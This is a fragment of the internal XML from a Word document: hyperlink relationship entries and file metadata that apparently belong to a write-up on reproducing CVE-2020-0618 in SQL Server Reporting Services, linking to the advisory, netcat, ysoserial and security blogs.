TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://eternallybored.org/misc/netcat/"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mp.weixin.qq.com/s/ZjZKLMwTW56MPb4Gb229Bg" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bbs.pediy.com/thread-257827.htm" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618"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www.postman.com/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/ReportServer/pages/ReportViewer.aspx&#65292;Body"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sdn.itellyou.c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ocalhost/ReportServer/pages/ReportViewer.aspx"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msdn.itellyou.cn/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pwntester/ysoserial.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blog.csdn.net/qq_40989258/article/details/10534434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14</Pages>
  <Words>966</Words>
  <Characters>5512</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>45</Lines>
  <Paragraphs>12</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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xcblj</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>xcblj</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-12T13:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-07T13:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>